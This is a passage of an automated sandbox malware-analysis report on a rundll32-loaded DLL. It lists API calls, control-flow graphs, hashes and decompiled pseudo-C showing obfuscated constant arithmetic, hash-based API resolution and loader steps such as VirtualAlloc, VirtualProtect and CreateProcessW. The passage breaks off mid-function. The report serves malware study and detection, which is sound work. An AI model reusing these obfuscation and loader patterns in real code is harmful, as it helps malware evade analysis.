                                                                                                                      control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 10006A9C
                                                                                                                        • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                        • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                        • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 501242067-0
                                                                                                                      • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                      • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                      • GlobalHandle.KERNEL32(009789A8), ref: 100208A9
                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                      • GlobalHandle.KERNEL32(009789A8), ref: 100208DB
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                      • _memset.LIBCMT ref: 10020911
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 496899490-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 1002FA87
                                                                                                                        • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                        • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                        • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                      • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                      • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714421763-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 220 10001b80-10001b90 221 10001b92-10001b97 220->221 222 10001b9c-10001ba8 220->222 223 10001c9c-10001c9f 221->223 224 10001c04-10001c66 222->224 225 10001baa-10001bb5 222->225 228 10001c74-10001c91 VirtualProtect 224->228 229 10001c68-10001c71 224->229 226 10001bb7-10001bbe 225->226 227 10001bfa-10001bff 225->227 230 10001bc0-10001bce 226->230 231 10001be2-10001bf4 VirtualFree 226->231 227->223 232 10001c93-10001c95 228->232 233 10001c97 228->233 229->228 230->231 234 10001bd0-10001be0 230->234 231->227 232->223 233->223 234->227 234->231
                                                                                                                      APIs
                                                                                                                      • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1263568516-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                      APIs
                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3296620671-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 250 10001a83-10001a9e call 10001990 247->250 251 10001a1d-10001a2a 247->251 249 10001b0b-10001b0e 248->249 260 10001aa0-10001aa2 250->260 261 10001aa4-10001ac9 VirtualAlloc 250->261 253 10001a2c-10001a4e VirtualAlloc 251->253 254 10001a7e 251->254 255 10001a50-10001a52 253->255 256 10001a57-10001a7b call 100017c0 253->256 254->246 255->249 256->254 260->249 263 10001acb-10001acd 261->263 264 10001acf-10001afe call 10001810 261->264 263->249 264->248
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                      • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 275 687f5d-687ff1 call 6920b9 call 69aa30 CreateProcessW
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0068AD99,?,?,?,181C8C04,0068AD99), ref: 00687FEB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 280 6946bb-69473b call 6920b9 call 69aa30 SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E006946BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				void* _t21;
                                                                                                                      				intOrPtr* _t25;
                                                                                                                      				void* _t26;
                                                                                                                      
                                                                                                                      				E006920B9(_t21);
                                                                                                                      				_v20 = 0x3f5bb0;
                                                                                                                      				_v16 = 0;
                                                                                                                      				_v12 = 0x996874;
                                                                                                                      				_v12 = _v12 << 0xf;
                                                                                                                      				_v12 = _v12 ^ 0xb43bad9d;
                                                                                                                      				_v8 = 0xebf0af;
                                                                                                                      				_v8 = _v8 ^ 0x3b7dcb24;
                                                                                                                      				_v8 = _v8 ^ 0x3b96d1fd;
                                                                                                                      				_t25 = E0069AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
                                                                                                                      				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
                                                                                                                      				return _t26;
                                                                                                                      			}











                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00694735
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1514166925-0
                                                                                                                      • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                      • Instruction ID: 8138711db78f60cb7f6d67080d35c8f170a005f8e593411a981c7ebdf95e3557
                                                                                                                      • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                      • Instruction Fuzzy Hash: 46012C75801218BBCF15AFD5DC098DFBFB9EF45394F108149F91826211D2758A60DBD5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 285 6893ed-689461 call 69aa30 ExitProcess
                                                                                                                      C-Code - Quality: 73%
                                                                                                                      			E006893ED() {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				void* _v24;
                                                                                                                      				intOrPtr _v28;
                                                                                                                      				intOrPtr _t24;
                                                                                                                      
                                                                                                                      				_v28 = 0xda6c64;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_v12 = 0x88a564;
                                                                                                                      				_v12 = _v12 | 0x9bf5ed5c;
                                                                                                                      				_v12 = _v12 ^ 0x9bf17c37;
                                                                                                                      				_v8 = 0xd9241f;
                                                                                                                      				_v8 = _v8 * 0x5c;
                                                                                                                      				_v8 = _v8 + 0xccdd;
                                                                                                                      				_v8 = _v8 + 0x903;
                                                                                                                      				_v8 = _v8 ^ 0x4e0c4bb2;
                                                                                                                      				E0069AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
                                                                                                                      				ExitProcess(0);
                                                                                                                      			}









                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNELBASE(00000000), ref: 0068945B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                      • Instruction ID: 505c56e86cc1302ab4807bd98990568a020ef5aa2fa044f323597b4455b5668e
                                                                                                                      • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                      • Instruction Fuzzy Hash: D4F03C71901308FBEB44DBE8DA4699DFBF4EB50314F2081A9D604B3261E7705F459A91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 305 68b23c-68b2c6 call 6920b9 call 69aa30 lstrcmpiW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E0068B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				void* _t27;
                                                                                                                      				int _t32;
                                                                                                                      
                                                                                                                      				_push(__ecx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t27);
                                                                                                                      				_v12 = 0x6268;
                                                                                                                      				_v12 = _v12 ^ 0x57e834c3;
                                                                                                                      				_v12 = _v12 + 0xffff2919;
                                                                                                                      				_v12 = _v12 + 0xffff3e3d;
                                                                                                                      				_v12 = _v12 ^ 0x57e9dc2b;
                                                                                                                      				_v8 = 0xa46433;
                                                                                                                      				_v8 = _v8 + 0x98ba;
                                                                                                                      				_v8 = _v8 | 0xc390ebe9;
                                                                                                                      				_v8 = _v8 + 0xd5b0;
                                                                                                                      				_v8 = _v8 ^ 0xc3bab866;
                                                                                                                      				E0069AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
                                                                                                                      				_t32 = lstrcmpiW(_a16, _a4); // executed
                                                                                                                      				return _t32;
                                                                                                                      			}








                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 0068B2C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                      • Instruction ID: 1f19db0def396c92a94c70fda46dd9b9bd9d83b8bb10be5a5c2972b251748b5a
                                                                                                                      • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                      • Instruction Fuzzy Hash: 1B011A72C04608FFDF45DFD4DD468AEBBB5EB44304F108188B90566152E3714B609B51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 79%
                                                                                                                      			E0069E395(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int* _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				intOrPtr _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _t823;
                                                                                                                      				void* _t829;
                                                                                                                      				signed int* _t832;
                                                                                                                      				signed int _t833;
                                                                                                                      				signed int _t845;
                                                                                                                      				signed int _t858;
                                                                                                                      				signed int _t862;
                                                                                                                      				intOrPtr _t868;
                                                                                                                      				signed int _t888;
                                                                                                                      				void* _t939;
                                                                                                                      				void* _t948;
                                                                                                                      				signed int _t956;
                                                                                                                      				signed int _t957;
                                                                                                                      				signed int _t958;
                                                                                                                      				signed int _t959;
                                                                                                                      				signed int _t960;
                                                                                                                      				signed int _t961;
                                                                                                                      				signed int _t962;
                                                                                                                      				signed int _t963;
                                                                                                                      				signed int _t964;
                                                                                                                      				signed int _t965;
                                                                                                                      				signed int _t966;
                                                                                                                      				signed int _t967;
                                                                                                                      				signed int _t968;
                                                                                                                      				signed int _t969;
                                                                                                                      				signed int _t970;
                                                                                                                      				signed int _t971;
                                                                                                                      				signed int _t972;
                                                                                                                      				signed int _t973;
                                                                                                                      				signed int _t974;
                                                                                                                      				signed int _t975;
                                                                                                                      				signed int _t976;
                                                                                                                      				signed int _t977;
                                                                                                                      				signed int _t981;
                                                                                                                      				signed int _t984;
                                                                                                                      				signed int _t985;
                                                                                                                      				signed int* _t988;
                                                                                                                      				void* _t991;
                                                                                                                      
                                                                                                                      				_push(_a44);
                                                                                                                      				_v4 = __ecx;
                                                                                                                      				_push(_a40);
                                                                                                                      				_v8 = __edx;
                                                                                                                      				_push(_a36);
                                                                                                                      				_push(_a32);
                                                                                                                      				_push(_a28);
                                                                                                                      				_push(_a24);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx & 0x0000ffff);
                                                                                                                      				E006920B9(__ecx & 0x0000ffff);
                                                                                                                      				_v284 = 0x99c43c;
                                                                                                                      				_t988 =  &(( &_v288)[0xd]);
                                                                                                                      				_v284 = _v284 + 0xbb14;
                                                                                                                      				_v284 = _v284 >> 0xb;
                                                                                                                      				_v284 = _v284 ^ 0x0000134f;
                                                                                                                      				_t862 = 0;
                                                                                                                      				_v120 = 0x27310;
                                                                                                                      				_t977 = 0x329d839;
                                                                                                                      				_t956 = 0x43;
                                                                                                                      				_v120 = _v120 / _t956;
                                                                                                                      				_v120 = _v120 + 0xe2f5;
                                                                                                                      				_v120 = _v120 ^ 0x0000ec43;
                                                                                                                      				_v36 = 0x50046c;
                                                                                                                      				_v36 = _v36 << 1;
                                                                                                                      				_v36 = _v36 ^ 0x00a00810;
                                                                                                                      				_v116 = 0x7f268a;
                                                                                                                      				_v116 = _v116 ^ 0x5f915552;
                                                                                                                      				_t957 = 0x1b;
                                                                                                                      				_v276 = 0;
                                                                                                                      				_v116 = _v116 * 0x3e;
                                                                                                                      				_v116 = _v116 ^ 0x3bc08e50;
                                                                                                                      				_v228 = 0xb299e8;
                                                                                                                      				_v228 = _v228 >> 0xe;
                                                                                                                      				_v228 = _v228 << 0x10;
                                                                                                                      				_v228 = _v228 * 0x42;
                                                                                                                      				_v228 = _v228 ^ 0xb8144000;
                                                                                                                      				_v64 = 0x620921;
                                                                                                                      				_v64 = _v64 | 0xbe88b167;
                                                                                                                      				_v64 = _v64 ^ 0xbeaab967;
                                                                                                                      				_v172 = 0xae09b0;
                                                                                                                      				_v172 = _v172 | 0xde677f7d;
                                                                                                                      				_v172 = _v172 ^ 0xc5d04777;
                                                                                                                      				_v172 = _v172 ^ 0x1b3b388a;
                                                                                                                      				_v132 = 0xc06abb;
                                                                                                                      				_v132 = _v132 ^ 0x2b7b17d1;
                                                                                                                      				_v132 = _v132 / _t957;
                                                                                                                      				_v132 = _v132 ^ 0x059ea5d4;
                                                                                                                      				_v236 = 0x9fdac6;
                                                                                                                      				_v236 = _v236 >> 4;
                                                                                                                      				_v236 = _v236 + 0x9b65;
                                                                                                                      				_v236 = _v236 * 0x7b;
                                                                                                                      				_v236 = _v236 ^ 0x051f8b2b;
                                                                                                                      				_v108 = 0xc74878;
                                                                                                                      				_v108 = _v108 + 0x314b;
                                                                                                                      				_v108 = _v108 * 0x41;
                                                                                                                      				_v108 = _v108 ^ 0x32a5e883;
                                                                                                                      				_v196 = 0x1587ec;
                                                                                                                      				_v196 = _v196 ^ 0x07496474;
                                                                                                                      				_v196 = _v196 >> 7;
                                                                                                                      				_t958 = 0x2c;
                                                                                                                      				_v196 = _v196 / _t958;
